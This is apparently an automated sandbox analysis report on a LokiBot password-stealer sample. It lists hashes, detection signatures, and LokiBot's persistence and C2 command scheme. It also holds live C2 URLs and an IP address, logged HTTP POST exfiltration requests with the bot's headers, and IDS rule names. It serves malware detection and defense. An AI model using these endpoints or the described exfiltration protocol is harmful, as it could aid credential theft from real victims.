Windows Analysis Report
XCN5xgaiac.exe

Overview

General Information

Sample name: XCN5xgaiac.exe
renamed because original name is a hash value
Original sample name: 24899E0590707E01CD9FBDFAB6DD922B.exe
Analysis ID: 1429011
MD5: 24899e0590707e01cd9fbdfab6dd922b
SHA1: ae88a813c9dd1d766134789052f1e8e1ecaeb4be
SHA256: 054527988476fbdfcca3d4eec4d530c5529e2360b3f84beab0578b1411cad952
Tags: exeLoki
Infos:

Detection

Lokibot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Lokibot
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Machine Learning detection for sample
PE file contains section with special chars
PE file has nameless sections
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Yara detected aPLib compressed binary
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
Loki Password Stealer (PWS), LokiBot "Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2
  • SWEED
  • The Gorgon Group
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws

AV Detection

barindex
Source: XCN5xgaiac.exe Avira: detected
Source: http://kbfvzoboss.bid/alien/fre.php URL Reputation: Label: malware
Source: http://alphastand.win/alien/fre.php URL Reputation: Label: malware
Source: http://alphastand.trade/alien/fre.php URL Reputation: Label: malware
Source: http://alphastand.top/alien/fre.php URL Reputation: Label: malware
Source: 00000000.00000002.1685515472.00000000026A8000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://94.156.65.182/tomthf/cvghx/five/fre.php"]}
Source: XCN5xgaiac.exe ReversingLabs: Detection: 68%
Source: XCN5xgaiac.exe Joe Sandbox ML: detected
Source: XCN5xgaiac.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: XCN5xgaiac.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Networking

barindex
Source: Traffic Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.4:49730 -> 94.156.65.182:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49730 -> 94.156.65.182:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49730 -> 94.156.65.182:80
Source: Traffic Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.4:49730 -> 94.156.65.182:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49730 -> 94.156.65.182:80
Source: Traffic Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.4:49731 -> 94.156.65.182:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49731 -> 94.156.65.182:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49731 -> 94.156.65.182:80
Source: Traffic Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.4:49731 -> 94.156.65.182:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49731 -> 94.156.65.182:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49732 -> 94.156.65.182:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49732 -> 94.156.65.182:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49732 -> 94.156.65.182:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49732 -> 94.156.65.182:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49732 -> 94.156.65.182:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49733 -> 94.156.65.182:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49733 -> 94.156.65.182:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49733 -> 94.156.65.182:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49733 -> 94.156.65.182:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49733 -> 94.156.65.182:80
Source: Malware configuration extractor URLs: http://kbfvzoboss.bid/alien/fre.php
Source: Malware configuration extractor URLs: http://alphastand.trade/alien/fre.php
Source: Malware configuration extractor URLs: http://alphastand.win/alien/fre.php
Source: Malware configuration extractor URLs: http://alphastand.top/alien/fre.php
Source: Malware configuration extractor URLs: http://94.156.65.182/tomthf/cvghx/five/fre.php
Source: Joe Sandbox View ASN Name: TERASYST-ASBG TERASYST-ASBG
Source: global traffic HTTP traffic detected: POST /tomthf/cvghx/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.65.182Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B3A45C1EContent-Length: 176Connection: close
Source: global traffic HTTP traffic detected: POST /tomthf/cvghx/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.65.182Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B3A45C1EContent-Length: 176Connection: close
Source: global traffic HTTP traffic detected: POST /tomthf/cvghx/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.65.182Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B3A45C1EContent-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /tomthf/cvghx/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.65.182Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B3A45C1EContent-Length: 149Connection: close
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.65.182
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.65.182
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.65.182
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.65.182
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.65.182
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.65.182
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.65.182
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.65.182
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.65.182
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.65.182
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.65.182
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.65.182
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.65.182
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.65.182
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.65.182
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.65.182
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.65.182
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.65.182
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.65.182
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.65.182
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.65.182
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.65.182
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.65.182
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.65.182
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.65.182
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.65.182
Source: C:\Users\user\Desktop\XCN5xgaiac.exe Code function: 4_2_00404ED4 recv, 4_2_00404ED4
Source: unknown HTTP traffic detected: POST /tomthf/cvghx/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.65.182Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B3A45C1EContent-Length: 176Connection: close
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 19 Apr 2024 23:57:02 GMTServer: Apache/2.2.15 (CentOS)Last-Modified: Wed, 17 Apr 2024 06:06:03 GMTETag: "61674-56f-61644a644707c"Accept-Ranges: bytesContent-Length: 1391Connection: closeContent-Type: text/html; charset=UTF-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 26 6d 64 61 73 68 3b 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 34 30 34 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 22 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 20 63 6f 6c 6f 72 3a 23 37 37 37 37 37 37 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 7d 0a 20 20 20 20 20 20 20 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 30 70 78 3b 20 63 6f 6c 6f 72 3a 23 39 39 41 37 41 46 3b 20 6d 61 72 67 69 6e 3a 20 37 30 70 78 20 30 20 30 20 30 3b 7d 0a 20 20 20 20 20 20 20 20 68 32 20 7b 63 6f 6c 6f 72 3a 20 23 44 45 36 43 35 44 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 61 72 69 61 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 31 70 78 3b 20 6d 61 72 67 69 6e 3a 20 2d 33 70 78 20 30 20 33 39 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 70 20 7b 77 69 64 74 68 3a 33 37 35 70 78 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 3b 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 20 7d 0a 20 20 20 20 20 20 20 20 64 69 76 20 7b 77 69 64 74 68 3a 33 37 35 70 78 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 6c 69 6e 6b 20 7b 63 6f 6c 6f 72 3a 20 23 33 34 35 33 36 41 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 76 69 73 69 74 65 64 20 7b 63 6f 6c
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 19 Apr 2024 23:57:03 GMTServer: Apache/2.2.15 (CentOS)Last-Modified: Wed, 17 Apr 2024 06:06:03 GMTETag: "61674-56f-61644a644707c"Accept-Ranges: bytesContent-Length: 1391Connection: closeContent-Type: text/html; charset=UTF-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 26 6d 64 61 73 68 3b 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 34 30 34 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 22 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 20 63 6f 6c 6f 72 3a 23 37 37 37 37 37 37 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 7d 0a 20 20 20 20 20 20 20 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 30 70 78 3b 20 63 6f 6c 6f 72 3a 23 39 39 41 37 41 46 3b 20 6d 61 72 67 69 6e 3a 20 37 30 70 78 20 30 20 30 20 30 3b 7d 0a 20 20 20 20 20 20 20 20 68 32 20 7b 63 6f 6c 6f 72 3a 20 23 44 45 36 43 35 44 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 61 72 69 61 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 31 70 78 3b 20 6d 61 72 67 69 6e 3a 20 2d 33 70 78 20 30 20 33 39 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 70 20 7b 77 69 64 74 68 3a 33 37 35 70 78 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 3b 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 20 7d 0a 20 20 20 20 20 20 20 20 64 69 76 20 7b 77 69 64 74 68 3a 33 37 35 70 78 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 6c 69 6e 6b 20 7b 63 6f 6c 6f 72 3a 20 23 33 34 35 33 36 41 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 76 69 73 69 74 65 64 20 7b 63 6f 6c
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 19 Apr 2024 23:57:04 GMTServer: Apache/2.2.15 (CentOS)Last-Modified: Wed, 17 Apr 2024 06:06:03 GMTETag: "61674-56f-61644a644707c"Accept-Ranges: bytesContent-Length: 1391Connection: closeContent-Type: text/html; charset=UTF-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 26 6d 64 61 73 68 3b 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 34 30 34 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 22 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 20 63 6f 6c 6f 72 3a 23 37 37 37 37 37 37 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 7d 0a 20 20 20 20 20 20 20 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 30 70 78 3b 20 63 6f 6c 6f 72 3a 23 39 39 41 37 41 46 3b 20 6d 61 72 67 69 6e 3a 20 37 30 70 78 20 30 20 30 20 30 3b 7d 0a 20 20 20 20 20 20 20 20 68 32 20 7b 63 6f 6c 6f 72 3a 20 23 44 45 36 43 35 44 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 61 72 69 61 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 31 70 78 3b 20 6d 61 72 67 69 6e 3a 20 2d 33 70 78 20 30 20 33 39 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 70 20 7b 77 69 64 74 68 3a 33 37 35 70 78 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 3b 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 20 7d 0a 20 20 20 20 20 20 20 20 64 69 76 20 7b 77 69 64 74 68 3a 33 37 35 70 78 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 6c 69 6e 6b 20 7b 63 6f 6c 6f 72 3a 20 23 33 34 35 33 36 41 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 76 69 73 69 74 65 64 20 7b 63 6f 6c
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 19 Apr 2024 23:57:04 GMTServer: Apache/2.2.15 (CentOS)Last-Modified: Wed, 17 Apr 2024 06:06:03 GMTETag: "61674-56f-61644a644707c"Accept-Ranges: bytesContent-Length: 1391Connection: closeContent-Type: text/html; charset=UTF-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 26 6d 64 61 73 68 3b 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 34 30 34 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 22 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 20 63 6f 6c 6f 72 3a 23 37 37 37 37 37 37 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 7d 0a 20 20 20 20 20 20 20 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 30 70 78 3b 20 63 6f 6c 6f 72 3a 23 39 39 41 37 41 46 3b 20 6d 61 72 67 69 6e 3a 20 37 30 70 78 20 30 20 30 20 30 3b 7d 0a 20 20 20 20 20 20 20 20 68 32 20 7b 63 6f 6c 6f 72 3a 20 23 44 45 36 43 35 44 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 61 72 69 61 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 31 70 78 3b 20 6d 61 72 67 69 6e 3a 20 2d 33 70 78 20 30 20 33 39 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 70 20 7b 77 69 64 74 68 3a 33 37 35 70 78 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 20 6d 61 72 67 69 